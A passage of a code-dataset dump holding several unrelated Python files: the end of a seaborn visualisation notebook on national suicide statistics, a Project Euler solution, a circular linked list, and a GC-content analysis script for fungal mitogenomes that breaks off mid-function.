]:\n\n\nsuicidesNo=pd.DataFrame(suicidesNo,columns=['suicidesNo'])\ncountry=pd.DataFrame(data.Country.unique(),columns=['country'])\ndata_suicide_countr=pd.concat([suicidesNo,country],axis=1)\n#sns.barplot(x=data.Country.unique(),y=suicidesNo) \n#plt.show()\n\n# In[ ]:\n\n\ndata_suicide_countr=data_suicide_countr.sort_values(by='suicidesNo',ascending=False)\n\n# In[ ]:\n\n\nsns.barplot(y=data_suicide_countr.country[:15],x=data_suicide_countr.suicidesNo[:15])\nplt.show()\n\n#

    It appears that after examining our data, we examined the total suicide rates and prepared a chart that handled the most from the least.

    \n\n# In[ ]:\n\n\ngrouop_data=data.groupby(['Age','Gender'])['SuicidesNo'].sum().unstack()\ngrouop_data=grouop_data.reset_index().melt(id_vars='Age')\n\n# In[ ]:\n\n\ngrouop_data_female=grouop_data.iloc[:6,:]\ngrouop_data_male=grouop_data.iloc[6:,:]\n\n# In[ ]:\n\n\ngrouop_data_female\n\n# In[ ]:\n\n\ngrouop_data_male\n\n# In[ ]:\n\n\nfemale_=[175437,208823,506233,16997,430036,221984]\nmale_=[633105,915089,1945908,35267,1228407,431134]\nplot_id = 0\nfor i,age in enumerate(['15-24 years','25-34 years','35-54 years','5-14 years','55-74 years','75+ years']):\n plot_id += 1\n plt.subplot(3,2,plot_id)\n plt.title(age)\n fig, ax = plt.gcf(), plt.gca()\n sns.barplot(x=['female','male'],y=[female_[i],male_[i]],color='blue')\n plt.tight_layout()\n fig.set_size_inches(10, 15)\nplt.show() \n\n#

    All data were analyzed. Graphical analysis was performed for all age rates for suicide rates.

    \n\n# In[ ]:\n\n\nsns.countplot(data.Generation)\nplt.title('Generation Counter')\nplt.xticks(rotation=45)\nplt.show()\n\n# In[ ]:\n\n\nsns.countplot(data.Generation,hue=data.Gender)\nplt.title('Generation hue Gender Counter')\nplt.show()\n\n# In[ ]:\n\n\ndata['Age'].unique()\n\n# In[ ]:\n\n\nindex_population=[]\nfor age in data['Age'].unique():\n index_population.append(sum(data[data['Age']==age].Population)/len(data[data['Age']==age].Population))\n \nplt.bar(['15-24 years','35-54 years','75+ years','25-34 years','55-74 years','5-14 years'],index_population,align='center',alpha=0.5)\nplt.xticks(rotation=90)\nplt.show()\n\n# In[ ]:\n\n\nindex_population\n\n# In[ ]:\n\n\nplt.figure(figsize=(10,5))\nsns.set(style='whitegrid')\nsns.boxplot(data['Population'])\nplt.show()\n\n# In[ ]:\n\n\ndata.head()\n\n# In[ ]:\n\n\nsns.set(style='whitegrid')\nsns.boxplot(data['GdpPerCapitalMoney'])\nplt.show()\n\n# In[ ]:\n\n\nsns.set(style='whitegrid')\nsns.boxplot(data.Year)\nplt.show()\n\n# In[ ]:\n\n\n# Plot the crashes where alcohol was involved\nsns.set_color_codes(\"muted\")\nsns.barplot(x=\"Year\", y=\"SuicidesNo\", data=data,\n label=\"Year Suicides\", color=\"b\")\nplt.xticks(rotation=90)\nplt.show()\n\n# In[ ]:\n\n\n\nplt.figure(figsize=(7,7))\ng = sns.FacetGrid(data, col=\"Generation\", hue=\"Year\",\n subplot_kws=dict(projection='polar'), height=5.5,\n sharex=False, sharey=False, despine=False)\n\nplt.show()\n\n# In[ ]:\n\n\n# Plot sepal with as a function of sepal_length across days\ng = sns.lmplot(x=\"Year\", y=\"SuicidesNo\", hue=\"Generation\",\n truncate=True, height=5, data=data)\n\n# Use more informative axis labels than are provided by default\ng.set_axis_labels(\"Year\", \"Suicides No\")\nplt.show()\n\n# In[ ]:\n\n\ndata.head()\n\n# In[ ]:\n\n\ndata.describe().plot(kind = \"Area\",fontsize=15, figsize = (20,10), table = True,colormap=\"rainbow\")\nplt.xlabel('Statistics',)\nplt.ylabel('Value')\nplt.title(\"General Statistics\")\nplt.show()\n\n# In[ ]:\n\n\nf,ax=plt.subplots(1,2,figsize=(18,8))\ndata['Generation'].value_counts().plot.pie(explode=[0.1,0.1,0.1,0.1,0.1,0.1],autopct='%1.1f%%',ax=ax[0],shadow=True)\nax[0].set_title('Generations Count')\nax[0].set_ylabel('Count')\nsns.countplot('Generation',data=data,ax=ax[1])\nax[1].set_title('Generations Count')\nplt.show()\n\n# In[ ]:\n\n\nfig=sns.jointplot(y='Suicides100kPop',x='Year',data=data)\nplt.show()\n\n# In[ ]:\n\n\nfig=sns.jointplot(y='SuicidesNo',x='Population',data=data)\nplt.show()\n\n# In[ ]:\n\n\nsns.jointplot(\"Year\", \"GdpPerCapitalMoney\", data=data, kind=\"reg\")\nplt.show()\n\n# In[ ]:\n\n\n# Show the joint distribution using kernel density estimation\ng = sns.jointplot(data.Year,data.GdpPerCapitalMoney, kind=\"kde\", height=7, space=0)\nplt.show()\n\n# In[ ]:\n\n\nfig=sns.jointplot(y='GdpPerCapitalMoney',x='SuicidesNo',kind='hex',data=data[data['Country']=='United States'])\nplt.show()\n\n# In[ ]:\n\n\nsns.jointplot(\"Suicides100kPop\", \"SuicidesNo\", data=data[data['Country']=='Russian Federation'], kind=\"kde\",space=0,color='g')\nplt.show()\n\n# In[ ]:\n\n\nimport matplotlib.pyplot as plt\nsns.FacetGrid(data,hue='Year',size=5).map(plt.scatter,'GdpPerCapitalMoney','Population').add_legend()\nplt.show()\n\n# In[ ]:\n\n\nsns.FacetGrid(data, hue=\"Generation\", size=6).map(sns.kdeplot, \"Population\").add_legend()\nplt.ioff() \nplt.show()\n\n# In[ ]:\n\n\nsns.countplot(x=\"Generation\", hue=\"Gender\",\n data=data)\nplt.xticks(rotation=45)\nplt.show()\n\n# In[ ]:\n\n\nsns.stripplot(x=data['SuicidesNo'])\nplt.show()\n\n# In[ ]:\n\n\nsns.set(style=\"white\")\n# Plot miles per gallon against horsepower with other semantics\nsns.relplot(x=\"Generation\",y=\"SuicidesNo\",hue=\"Gender\",\n sizes=(40, 400), alpha=.5, palette=\"muted\",\n height=6, data=data)\nplt.show()\n\n# In[ ]:\n\n\nplt.figure(figsize=(10,7))\nsns.stripplot(x=\"Year\",y='Suicides100kPop',data=data)\nplt.xticks(rotation=45)\nplt.show()\n\n# In[ ]:\n\n\nplt.figure(figsize=(10,10))\nsns.factorplot(x=\"SuicidesNo\", y=\"Gender\", kind='violin',data=data)\nplt.show()\n\n# In[ ]:\n\n\nplt.scatter(x=np.arange(1,27821),y=data['Suicides100kPop'].values.tolist())\nplt.show()\n\n# In[ ]:\n\n\nplt.scatter(x=np.arange(1,27821),y=data['SuicidesNo'].values.tolist())\nplt.show()\n\n# In[ ]:\n\n\nplt.scatter(x=np.arange(1,27821),y=data['Population'].values.tolist())\nplt.show()\n\n# In[ ]:\n\n\nplt.scatter(x=np.arange(1,27821),y=data['GdpPerCapitalMoney'].values.tolist())\nplt.show()\n\n# In[ ]:\n\n\nsns.distplot(data['Suicides100kPop'])\nplt.show()\n\n# In[ ]:\n\n\nsns.set_color_codes()\nsns.distplot(data['Country'].value_counts().values,color='r')\nplt.show()\n\n# In[ ]:\n\n\ndata[(data['Gender']=='male')].Age.value_counts().values\n\n# In[ ]:\n\n\n# Plot the responses for different events and regions\nsns.lineplot(x=\"SuicidesNo\", y=\"Suicides100kPop\",\n hue=\"Gender\",data=data.sort_values(by='Suicides100kPop',ascending=False))\nplt.show()\n\n# In[ ]:\n\n\nsns.pairplot(data,hue='Generation')\nplt.show()\n\n# In[ ]:\n\n\nsns.pairplot(data, hue=\"Gender\")\nplt.show()\n\n# In[ ]:\n\n\n# Plot the residuals after fitting a linear model\nsns.residplot('SuicidesNo','Suicides100kPop', data=data,lowess=True, color=\"g\")\nplt.show()\n\n# In[ ]:\n\n\nsns.distplot(data[(data['Gender']=='female')].Age.value_counts().values)\nplt.show()\n\n# In[ ]:\n\n\nsns.violinplot(x=data['Generation'],y=data['Population'])\nplt.show()\n\n# In[ ]:\n\n\nsns.heatmap(data.corr(),cmap='YlGnBu',annot=True)\nplt.show()\n\n# In[ ]:\n\n\n# Draw the heatmap with the mask and correct aspect ratio\nsns.heatmap(data.corr(), vmax=.3, center=1,\n square=True, linewidths=.5,annot=True)\nplt.show()\n\n# In[ ]:\n\n\ncmap = sns.diverging_palette(220, 10, as_cmap=True)\n\n# Draw the heatmap with the mask and correct aspect ratio\nsns.heatmap(data.corr(), cmap=cmap, vmax=.3, center=0,\n square=True, linewidths=.5, cbar_kws={\"shrink\": .5})\nplt.show()\n\n# In[ ]:\n\n\nsns.boxplot(x=data['Generation'],y=data['Population'])\nplt.xticks(rotation=90)\n\n# In[ ]:\n\n\nsns.boxenplot(x=\"Generation\", y=\"SuicidesNo\",\n color=\"b\",\n scale=\"linear\", data=data)\nplt.tight_layout()\nplt.show()\n\n# In[ ]:\n\n\ndata.head()\n\n# In[ ]:\n\n\nmax(data.SuicidesNo)\n\n# In[ ]:\n\n\nmin(data.SuicidesNo)\n\n# In[ ]:\n\n\ndata[data.SuicidesNo==max(data.SuicidesNo)]\n\n# In[ ]:\n\n\ndata[data['Country']=='Russian Federation'].hist()\nplt.tight_layout()\nplt.show()\n\n# In[ ]:\n\n\ndata[data.SuicidesNo==min(data.SuicidesNo)]\n\n# In[ ]:\n\n\ndata[data['Country']=='Albania'].hist()\nplt.tight_layout()\nplt.show()\n\n# In[ ]:\n\n\n# Show the results of a linear regression within each dataset\nsns.lmplot(x=\"Population\", y=\"GdpPerCapitalMoney\", data=data)\nplt.show()\n\n# In[ ]:\n\n\nsns.set(style=\"whitegrid\")\n\n# Make an example dataset with y ~ x\nrs = np.random.RandomState(7)\nx = rs.normal(2, 1, 75)\ny = 2 + 1.5 * x + rs.normal(0, 2, 75)\n\n# Plot the residuals after fitting a linear model\nsns.residplot(x, y, lowess=True, color=\"g\")\nplt.show()\n\n# In[ ]:\n\n\nfrom sklearn.preprocessing import LabelEncoder\nle=LabelEncoder()\ndata.iloc[:,-1]=le.fit_transform(data.iloc[:,-1])\n\n# In[ ]:\n\n\ndata.head(2)\n\n# In[ ]:\n\n\nsns.pairplot(data, hue=\"Generation\")\nplt.show()\n\n#

    References

    \n#

    https://www.kaggle.com/spscientist/students-performance-in-exams

    \n#

    https://seaborn.pydata.org/

    \n#

    https://www.kaggle.com/kanncaa1/seaborn-tutorial-for-beginners

    \n#

    https://www.kaggle.com/biphili/seaborn-plot-to-visualize-iris-data

    \n#

    https://www.kaggle.com/kralmachine/seaborn-tutorial-for-beginners

    \n\n#

    Conclusion

    \n#

    As a result, we have explained the seaborn library in a very detailed way and created a wide variety of graphs. If you like it, I expect your support. If you like UPVOTED I would be very happy if you do. If you have any questions, I am ready to answer your questions. At the bottom there are the kernel values that I have already done.

    \n#

    https://www.kaggle.com/kralmachine/data-visualization-of-suicide-rates

    \n#

    https://www.kaggle.com/kralmachine/gradient-admission-eda-ml-0-92

    \n#

    https://www.kaggle.com/kralmachine/football-results-from-1872-to-2018-datavisulation

    \n#

    https://www.kaggle.com/kralmachine/pandas-tutorial-for-beginner

    \n#

    https://www.kaggle.com/kralmachine/visual-analysis-of-world-happiness-in-2015

    \n","repo_name":"tetherless-world/CodeGraph","sub_path":"kaggle/python_files/sample531.py","file_name":"sample531.py","file_ext":"py","file_size_in_byte":18220,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"21150685799","text":"def gcd(a, b):\n x = max(a, b)\n y = min(a, b)\n while y != 0:\n x, y = y, x % y\n return x\n\n\ndef mod_mul(x, y, n):\n res = 0\n i = 1\n j = x % n\n while i <= y:\n if y & i != 0:\n res += j\n res %= n\n i *= 2\n j *= 2\n j %= n\n return res\n\n\ndef cycle(x, n):\n y = x\n count = 1\n while y != 1:\n y = mod_mul(y, x, n)\n count += 1\n return count\n\n\ndef lcm(x, y):\n return x * y // gcd(x, y)\n\n\ndef best_remainder(a):\n best = 2\n x, y = a - 1, a + 1\n for i in range(lcm(cycle(a - 1, a ** 2), cycle(a + 1, a ** 2))):\n if (x + y) % a ** 2 > best:\n best = (x + y) % a ** 2\n x = mod_mul(x, a - 1, a ** 2)\n y = mod_mul(y, a + 1, a ** 2)\n return best\n\n\ndef total(n):\n return sum([best_remainder(i) for i in range(3, n + 1)])\n","repo_name":"womri1998/ProjectEuler100s","sub_path":"problem120.py","file_name":"problem120.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4187247313","text":"class Node:\n def __init__(self, val, next=None):\n self.val = val\n self.next = None\n\n def __str__(self):\n return f'{self.val},{self.next}'\n \nclass CLL:\n def __init__(self):\n self.head = None\n\n def insert(self, val):\n if self.head is None:\n self.head = Node(val)\n self.head.next = self.head\n return\n cur=dum=self.head\n while cur.next is not dum:\n cur=cur.next\n cur.next=Node(val)\n cur.next.next=dum\n \n def display(self,head):\n cur=self.head\n op = [str(cur.val)]\n cur=cur.next\n while cur is not self.head:\n op.append(str(cur.val))\n cur=cur.next\n return ' -> '.join(op)\n\n def splitl(self,head):\n f=s=head\n while f.next is not head and f.next.next is not head:\n f=f.next.next\n s=s.next\n print(f'second half is {self.display(s.next)}')\n\ncll=CLL()\ncll.insert(1)\ncll.insert(2)\ncll.insert(3)\ncll.insert(4)\nprint(cll.display(cll.head))\ncll.splitl(cll.head)\n","repo_name":"mahadev521/Book1","sub_path":"linkedlists/cll.py","file_name":"cll.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42632310261","text":"#This script is part of supplementary documents of \"Impact of Introns and Homing Endonucleases on Structural Mitogenome Shaping in Hypocreales\"\n#submitted to Frontiers in Microbiology, section Fungi and Their Interactions\n#Manuscript ID: 531057\n#Authors: Paula Fonseca, Fernanda Badotti, Ruth De-Paula, Daniel Araújo, Dener Eduardo Bortolini, Luiz-Eduardo Del-Bem, Vasco Ariston De Carvalho Azevedo, \n#Bertram Brenig, Eric Roberto Guimarães Rocha Aguiar, Aristóteles Góes-Neto\n\n#This script calculates the GC content of whole genome, CDS and genes in the uORFs file\n#The files used are as follow: \n# -uORFs - Generated by Mfannot2uORFs.py script\n# -cds - Generated by getGenesGenBank2Cds.py script\n# -fasta - Donwloaded from NCBI\n\n#******************************************************************************#\n# Run the code in Python 3+ #\n#******************************************************************************#\n\n# -*- Coding: UTF-8 -*-\n#coding: utf-8\n\nimport sys\nimport os.path\nfrom os import path\n\ndef checkInputFiles():\n # #Check if all the necessary files names are passed as arguments\n if (len(sys.argv)!=4 or sys.argv[1].find(\".uORFs\")==-1 or sys.argv[2].find(\".cds\")==-1 or sys.argv[3].find(\".fasta\")==-1):\n print(\"\\n----------------------------------------------------------------------------------------------------\\n\")\n print(\"\\nUsage:\\npython GCContentORFsCdsCirc.py [file_path_name.uORFs] [file_path_name.cds] [file_path_name.fasta]\\n\")\n sys.exit(0)\n\n #Get path/file names\n uORFs_file_name=sys.argv[1]\n cds_file_name=sys.argv[2]\n fasta_file_name=sys.argv[3]\n\n #Check if path/files exists\n if (path.exists(uORFs_file_name)==False or path.exists(cds_file_name)==False or path.exists(fasta_file_name)==False):\n print(\"\\n--------------------------------------------------------------------------------------------\\n\")\n print(\"\\nOne or more files not found! Check the path and file names.\\n\")\n print(\"\\n--------------------------------------------------------------------------------------------\\n\")\n exit(0)\n\n #Open input files\n uORFs_file=open(uORFs_file_name,'r') \n cds_file=open(cds_file_name, 'r')\n fasta_file=open(fasta_file_name,'r')\n\n #Open output files. The ID filename in uORFs file is used to generate the result files ('.gct' and '.csv')\n if (os.name==\"nt\"):\n uORFs_file_name=uORFs_file_name.strip(\".\\\\\")\n output_file_name=uORFs_file_name[0:uORFs_file_name.find(\".\")]\n output_gct_file=open(output_file_name+\".gct\",'w')\n #The csv file was generated to help analyze the results. Each row of 'csv' file represent a nucleotide position in the whole genome. \n #The idea is as follows:\n #Row value= 0 = indicates the nucleotide belongs a non coding region\n #Row value= 1 = indicates the nucleotide belongs a coding region\n #Row value= 2 = indicates the nucleotide belongs a coding region and to 2 genes. \n #Row value= 10 = indicates the nucleotide belongs a non coding region and to a uORF\n #Row value= 11 = indicates the nucleotide belongs a coding region and to a uORF\n #Row value= 12 = indicates the nucleotide belongs a coding region, to a uORF and 2 genes\n #Row value= 22 = indicates the nucleotide belongs a coding region, to 2 uORFs and 2 genes\n #and so on\n #The strip will remove '.\\' that appear on console in Windows 10 before path\\filename \n output_csv_file=open(output_file_name+\".csv\",'w')\n\n return uORFs_file,cds_file,fasta_file,output_gct_file,output_csv_file \n\n\n#This function creates a numerical array (genome_array) which will tell us where the coding, non coding and uORFs are.\n#Based on cds file, the genome_array returned from it contains the data of coding and noncoding regions of genes detailed in GenBank \ndef createGenomeArray(cds_file):\n #genome_array represent the whole genome. Position 0 is not used.\n genome_array=[]\n genome_size=0\n #Loop to get data from cds file\n for line in cds_file: \n #get total genome size from cds file\n if (line.find(\"Genome size: \")!=-1):\n genome_size=int(line[13:]) \n #Instantiate size of genome in genome_array and populates with value=0\n genome_array=[0]*(genome_size+1)\n \n #Get start and end positions of coding regions (genes on cds)\n if (line.find(\";\")!=-1):\n aux_index=line.find(\";\")\n line=line.strip()\n start=int(line[:aux_index])\n end=int(line[aux_index+1:line.find(\"#\")])\n #Loop to register nucleotides that belong to coding regions, based on start and end positions retrieved\n #This adds +1 every time a nucleotide belong to a gene in cds file\n #To contemplate the circular genome, we use a while loop to process every nucleotide in the sequence\n i=start\n while True:\n genome_array[i]=genome_array[i]+1\n if (i==end):\n break\n i=i+1\n #Check if it is the final position of genome and point to the first one\n if (i>len(genome_array)-1):\n i=1\n return genome_size,genome_array\n\ndef checkCG(nc_char):\n if (nc_char=='C' or nc_char=='G'):\n return True\n else:\n return False\n\n#This function calculates the GC content of the coding and non coding regions of a sequence. Using the genome_array as input,\n#its possible to determinte the GC content in coding and non coding regions. \ndef gcContentCalc(start, end, sequence, genome_array):\n #seq_cds store the sequence of nucleotides that are part of the coding region. Those nucleotides that are not part of the coding region are replaced by '-'\n seq_cds=\"\"\n #sum_GC_nc store the sum of GC nucleotides in the sequence\n sum_GC_nc=0\n #sum_GC_nc_cds store the sum of GC nucleotides that are part of coding region in the sequence\n sum_GC_nc_cds=0\n #sum_nc_cds store the sum of ALL nucleotides that are part of coding region in the sequence\n sum_nc_cds=0\n #For every nucleotide in the sequence we do a while loop which comtemplate the circular genome\n #Here we have a sequence of interest being compared and saved on seq_cds, because of this we have a second iterator\n i=start\n seq_it=0\n while True:\n if (checkCG(sequence[seq_it])):\n sum_GC_nc=sum_GC_nc+1\n #Check if nucleotide is part of coding region\n #uORFs nucleotides adds +10 to genome_array and gene coding regions derived form cds file adds +1\n #So we get the remainder of division by 10\n if (genome_array[i]%10>0):\n sum_GC_nc_cds= sum_GC_nc_cds+1\n sum_nc_cds=sum_nc_cds+1\n #Add nucleotide to seq_cds\n seq_cds=seq_cds+sequence[seq_it]\n else:\n seq_cds=seq_cds+'-'\n elif (genome_array[i]%10>0):\n sum_nc_cds=sum_nc_cds+1\n #Add nucleotide to seq_cds\n seq_cds=seq_cds+sequence[seq_it]\n else:\n seq_cds=seq_cds+'-'\n #Adding +10 to genome_array will help later check where are the nucleotides that belong to uORFs in csv file\n #Values greater than or equal 10\n genome_array[i]=genome_array[i]+10\n if (i==end):\n break\n i=i+1\n seq_it=seq_it+1\n #Check if 'i' it is the final position of genome and point to the first one\n if (i>len(genome_array)-1):\n i=1\n tam_seq=len(sequence)\n #The next command line returns: proportion of GC nucleotides in the sequence\n #Nucleotides in coding region of the sequence\n #Total of GC nucleotides in the sequence\n #Total of GC nucleotides in the coding region of the sequence\n #Total of nucleotides in the coding region of the sequence\n return seq_cds, sum_GC_nc, sum_GC_nc_cds, sum_nc_cds\n\n\n#This function read the whole genome from fasta file\ndef readWholeGenome(fasta_file):\n #The position 0 of whole_genome will not be used\n whole_genome=\" \"\n for line in fasta_file:\n if(line[0]!=\">\"):\n line=line.upper()\n whole_genome=whole_genome+line.strip()\n fasta_file.close()\n return whole_genome\n\n#Funtion that prints and save on output file the individual ORFs results\ndef printSaveuORFsResults(name_ORF,seq_ORF,sum_ORF_cds,start_ORF,end_ORF,ratio_GC_ORF,ratio_GC_ORF_cds,output_gct_file):\n print(\"____________________________________________________________\")\n print(name_ORF)\n print(\"uORf original sequence:\\n\"+seq_ORF+\"\\nuORF sequence in CDS:\\n\"+sum_ORF_cds)\n print(start_ORF, end_ORF)\n print(\"GC Content of Orf:\",round(ratio_GC_ORF,2))\n print(\"GC Content of Orf in CDS:\",round(ratio_GC_ORF_cds,2))\n output_gct_file.write(name_ORF)\n output_gct_file.write(str(start_ORF)+\",\"+str(end_ORF)+\"\\n\")\n output_gct_file.write(\"uORf original sequence:\\n\"+seq_ORF.rstrip()+\"\\nuORF sequence in CDS:\\n\"+sum_ORF_cds+\"\\n\")\n output_gct_file.write(\"Conteudo GC Orf: \"+str(round(ratio_GC_ORF,2))+\"\\nConteudo GC Orf CDS: \"+str(round(ratio_GC_ORF_cds,2))+\"\\n\\n\")\n\n#Function that reads the uORFs file and calculate GC content for each one of the ORFs listed in it. Summary variables are returned as result.\ndef uORFsFileGCCalc(uORFs_file, genome_array, output_gct_file):\n name_ORF=\"\"\n #Total number of GC ORFs nucleotides\n sum_nc_GC_ORFs=0\n #Total number of GC ORFs nucleotides that are part of coding regions\n sum_nc_GC_ORFs_cds=0\n #Total number of ORFs nucleotides\n sum_nc_ORFs=0\n #Total number of ORFs nucleotides in coding regions\n sum_nc_ORFs_cds=0\n for line in uORFs_file:\n if (line.find(\">\")!=-1):\n name_ORF=line[1:]\n elif (line.find(\"+\")!=-1):\n start_ORF=int(line[1:])\n elif (line.find(\"-\")!=-1):\n end_ORF=int(line[1:])\n elif (line.find(\"@\")!=-1):\n seq_ORF=line[1:].upper().strip()\n size_ORF=len(seq_ORF)\n #Call function that calculate GC Content and update genome_array\n sum_ORF_cds, sum_GC_ORF_nc, sum_GC_ORF_nc_cds, sum_ORF_nc_cds=gcContentCalc(start_ORF, end_ORF, seq_ORF, genome_array)\n\n #Ratio_GC_ORF shows the proportion of GC nucleotides of the sequence\n ratio_GC_ORF=sum_GC_ORF_nc/len(seq_ORF)*100\n\n #Ratio_GC_ORF_cds shows the proportion of GC nucleotides in the coding region of the sequence\n ratio_GC_ORF_cds=0\n #Check to avoid division by 0\n if (sum_ORF_nc_cds>0):\n ratio_GC_ORF_cds=sum_GC_ORF_nc_cds/sum_ORF_nc_cds*100\n else:\n ratio_GC_ORF_cds=sum_GC_ORF_nc_cds/1*100\n #Print and save in output files the ORF values\n printSaveuORFsResults(name_ORF, seq_ORF, sum_ORF_cds, start_ORF, end_ORF, ratio_GC_ORF, ratio_GC_ORF_cds, output_gct_file)\n\n sum_nc_GC_ORFs=sum_nc_GC_ORFs + sum_GC_ORF_nc\n sum_nc_GC_ORFs_cds=sum_nc_GC_ORFs_cds + sum_GC_ORF_nc_cds\n sum_nc_ORFs=sum_nc_ORFs+size_ORF\n sum_nc_ORFs_cds=sum_nc_ORFs_cds+sum_ORF_nc_cds\n\n #Return summary values\n return sum_nc_GC_ORFs,sum_nc_GC_ORFs_cds,sum_nc_ORFs,sum_nc_ORFs_cds,sum_nc_ORFs-sum_nc_ORFs_cds\n\n#Print and saves on input file the final summary results\ndef printSaveFinalSummary(genome_size, sum_nc_genome_cds, sum_nc_genome_noncod, sum_GC_nc, sum_GC_nc_cds, sum_GC_nc_noncod, sum_nc_ORFs, sum_nc_GC_ORFs, sum_nc_ORFs_cds, \\\n sum_nc_GC_ORFs_cds, sum_nc_ORFs_noncod, output_gct_file):\n\n print(\"____________________________________________________________\")\n print(\"\\n\")\n print(\"------------------------------------------------------------------------------------------------------------------------------------\")\n print(\"Whole genome total size = \"+str(genome_size)+\" nucleotides, where \"+ str(sum_nc_genome_cds)+\" nucleotides (\"+str(round(sum_nc_genome_cds/genome_size*100,2)) \\\n +\"%) belongs to coding regions (CDS) and \"+ str(sum_nc_genome_noncod)+\" nucleotides (\"+str(round(sum_nc_genome_noncod/genome_size*100,2))+\"%) belongs to non coding regions (NC)\")\n print(\"Whole genome GC content = \"+str(sum_GC_nc)+\" of \"+str(genome_size)+\" nucleotides (\"+str(round(sum_GC_nc/genome_size*100,2))+\"%)\")\n print(\"GC content in coding regions = \"+str(sum_GC_nc_cds)+\" of \"+str(sum_nc_genome_cds)+\" nucleotides (\"+str(round(sum_GC_nc_cds/sum_nc_genome_cds*100,2))+\"%)\")\n print(\"GC content in non coding regions = \"+str(sum_GC_nc_noncod)+\" of \"+str(sum_nc_genome_noncod)+\" nucleotides (\" +str(round(sum_GC_nc_noncod/sum_nc_genome_noncod*100,2))+\"%)\") \n print(\"uORFs total size = \"+ str(sum_nc_ORFs) + \" nucleotides, corresponding to \" + str(round(sum_nc_ORFs/genome_size*100,2))+ \"% \"+\"of whole genome\")\n print(\"uORfs GC content = \" +str(sum_nc_GC_ORFs)+\" of \"+str(sum_nc_ORFs)+\" nucleotides (\"+str(round(sum_nc_GC_ORFs/sum_nc_ORFs*100,2))+\"%)\")\n print(\"uORFs total size in coding regions (CDS) = \"+ str(sum_nc_ORFs_cds) + \" of \"+ str(sum_nc_ORFs)+\" nucleotides (\"+str(round(sum_nc_ORFs_cds/sum_nc_ORFs*100,2))+\"%)\")\n print(\"uORFs total size in non coding regions (NC) = \"+ str(sum_nc_ORFs_noncod) + \" of \"+ str(sum_nc_ORFs)+\" nucleotides (\"+str(round(sum_nc_ORFs_noncod/sum_nc_ORFs*100,2))+\"%)\")\n print(\"uORFs GC content in coding regions (CDS) = \" +str(sum_nc_GC_ORFs_cds)+\" of \"+str(sum_nc_ORFs_cds) + \" nucleotides (\"+ str(round(sum_nc_GC_ORFs_cds/sum_nc_ORFs_cds*100,2))+\"%)\")\n #Avoid division by 0\n if (sum_nc_ORFs_noncod!=0):\n print(\"uORFs GC content in non coding regions (NC) = \" +str(sum_nc_GC_ORFs-sum_nc_GC_ORFs_cds)+\" of \"+str(sum_nc_ORFs_noncod) + \" nucleotides (\"+ \\\n str(round((sum_nc_GC_ORFs-sum_nc_GC_ORFs_cds)/(sum_nc_ORFs_noncod)*100,2))+\"%)\")\n else:\n print(\"uORFs GC content in non coding regions (NC) = \" +str(sum_nc_GC_ORFs-sum_nc_GC_ORFs_cds)+\" of \"+str(sum_nc_ORFs_noncod) + \" nucleotides (0%)\")\n print(\"------------------------------------------------------------------------------------------------------------------------------------\")\n\n output_gct_file.write(\"\\n\")\n output_gct_file.write(\"------------------------------------------------------------------------------------------------------------------------------------\\n\")\n output_gct_file.write(\"Whole genome total size = \"+str(genome_size)+\" nucleotides, where \"+ str(sum_nc_genome_cds)+\" nucleotides (\"+str(round(sum_nc_genome_cds/genome_size*100,2)) \\\n +\"%) belongs to coding regions (CDS) and \"+ str(sum_nc_genome_noncod)+\" nucleotides (\"+str(round(sum_nc_genome_noncod/genome_size*100,2))+\"%) belongs to non coding regions (NC)\\n\")\n output_gct_file.write(\"Whole genome GC content = \"+str(sum_GC_nc)+\" of \"+str(genome_size)+\" nucleotides (\"+str(round(sum_GC_nc/genome_size*100,2))+\"%)\\n\")\n output_gct_file.write(\"GC content in coding regions = \"+str(sum_GC_nc_cds)+\" of \"+str(sum_nc_genome_cds)+\" nucleotides (\"+str(round(sum_GC_nc_cds/sum_nc_genome_cds*100,2))+\"%)\\n\")\n output_gct_file.write(\"GC content in non coding regions = \"+str(sum_GC_nc_noncod)+\" of \"+str(sum_nc_genome_noncod)+\" nucleotides (\" +str(round(sum_GC_nc_noncod/sum_nc_genome_noncod*100,2))+\"%)\\n\") \n output_gct_file.write(\"uORFs total size = \"+ str(sum_nc_ORFs) + \" nucleotides, corresponding to \" + str(round(sum_nc_ORFs/genome_size*100,2))+ \"% \"+\"of whole genome\\n\")\n output_gct_file.write(\"uORfs GC content = \" +str(sum_nc_GC_ORFs)+\" of \"+str(sum_nc_ORFs)+\" nucleotides (\"+str(round(sum_nc_GC_ORFs/sum_nc_ORFs*100,2))+\"%)\\n\")\n output_gct_file.write(\"uORFs total size in coding regions (CDS) = \"+ str(sum_nc_ORFs_cds) + \" of \"+ str(sum_nc_ORFs)+\" nucleotides (\"+str(round(sum_nc_ORFs_cds/sum_nc_ORFs*100,2))+\"%)\\n\")\n output_gct_file.write(\"uORFs total size in non coding regions (NC) = \"+ str(sum_nc_ORFs_noncod) + \" of \"+ str(sum_nc_ORFs)+\" nucleotides (\"+str(round(sum_nc_ORFs_noncod/sum_nc_ORFs*100,2))+\"%)\\n\")\n output_gct_file.write(\"uORFs GC content in coding regions (CDS) = \" +str(sum_nc_GC_ORFs_cds)+\" of \"+str(sum_nc_ORFs_cds) + \" nucleotides (\"+ str(round(sum_nc_GC_ORFs_cds/sum_nc_ORFs_cds*100,2))+\"%)\\n\")\n #Avoid division by 0\n if (sum_nc_ORFs_noncod!=0):\n output_gct_file.write(\"uORFs GC content in non coding regions (NC) = \" +str(sum_nc_GC_ORFs-sum_nc_GC_ORFs_cds)+\" of \"+str(sum_nc_ORFs_noncod) + \" nucleotides (\"+ \\\n str(round((sum_nc_GC_ORFs-sum_nc_GC_ORFs_cds)/(sum_nc_ORFs_noncod)*100,2))+\"%)\\n\")\n else:\n output_gct_file.write(\"uORFs GC content in non coding regions (NC) = \" +str(sum_nc_GC_ORFs-sum_nc_GC_ORFs_cds)+\" of \"+str(sum_nc_ORFs_noncod) + \" nucleotides (0%)\\n\")\n output_gct_file.write(\"------------------------------------------------------------------------------------------------------------------------------------\\n\")\n\n#Calculate GC content in whole Genome\ndef wholeGenomeGCCalc(output_csv_file,output_gct_file,whole_genome, genome_array):\n #Total of nucleotides in the whole genome that belongs to coding regions\n sum_nc_genome_cds=0\n #Total of nucleotides in the whole genome that belongs to non coding regions\n 